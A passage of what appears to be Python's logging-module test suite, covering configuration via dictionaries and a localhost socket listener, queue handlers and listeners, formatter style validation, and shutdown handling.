logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raise as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def assert_error_message(self, exception, message, *args, **kwargs):
try:
self.assertRaises(exception, *args, **kwargs)
except exception as e:
self.assertEqual(message, e.message)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
f = logging.Formatter("${asctime} - $message", style="$")
self.assertEqual(f._fmt, "${asctime} - $message")
f = logging.Formatter("$bar $$", style="$")
self.assertEqual(f._fmt, "$bar $$")
f = logging.Formatter("$bar $$$$", style="$")
self.assertEqual(f._fmt, "$bar $$$$") # this would print two $($$)
# Testing when ValueError being raised from incorrect format
# Percentage Style
self.assertRaises(ValueError, logging.Formatter, "%(asctime)Z")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)b")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)*3s")
self.assertRaises(ValueError, logging.Formatter, "%(asctime)_")
self.assertRaises(ValueError, logging.Formatter, '{asctime}')
self.assertRaises(ValueError, logging.Formatter, '${message}')
self.assertRaises(ValueError, logging.Formatter, '%(foo)#12.3*f') # with both * and decimal number as precision
self.assertRaises(ValueError, logging.Formatter, '%(foo)0*.8*f')
# StrFormat Style
# Testing failure for '-' in field name
self.assert_error_message(
ValueError,
"invalid field name/expression: 'name-thing'",
logging.Formatter, "{name-thing}", style="{"
)
# Testing failure for style mismatch
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '%(asctime)s', style='{'
)
# Testing failure for invalid conversion
self.assert_error_message(
ValueError,
"invalid conversion: 'Z'"
)
self.assertRaises(ValueError, logging.Formatter, '{asctime!s:#30,15f}', style='{')
self.assert_error_message(
ValueError,
"invalid format: expected ':' after conversion specifier",
logging.Formatter, '{asctime!aa:15}', style='{'
)
# Testing failure for invalid spec
self.assert_error_message(
ValueError,
"bad specifier: '.2ff'",
logging.Formatter, '{process:.2ff}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{process:.2Z}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<##30,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:<#30#,12g}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{process!s:{{w}},{{p}}}', style='{')
# Testing failure for mismatch braces
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, '{process', style='{'
)
self.assert_error_message(
ValueError,
"invalid format: unmatched '{' in format spec",
logging.Formatter, 'process}', style='{'
)
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{{foo!r:4.2}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo/bar}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo:{{w}}.{{p}}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!X:{{w}}.{{p}}}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:random}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{dom}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo!a:ran{d}om}', style='{')
self.assertRaises(ValueError, logging.Formatter, '{foo.!a:d}', style='{')
# Dollar style
# Testing failure for mismatch bare $
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, '$bar $$$', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'bar $', style='$'
)
self.assert_error_message(
ValueError,
"invalid format: bare \'$\' not allowed",
logging.Formatter, 'foo $.', style='$'
)
# Testing failure for mismatch style
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, '{asctime}', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '%(asctime)s', style='$')
# Testing failure for incorrect fields
self.assert_error_message(
ValueError,
"invalid format: no fields",
logging.Formatter, 'foo', style='$'
)
self.assertRaises(ValueError, logging.Formatter, '${asctime', style='$')
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
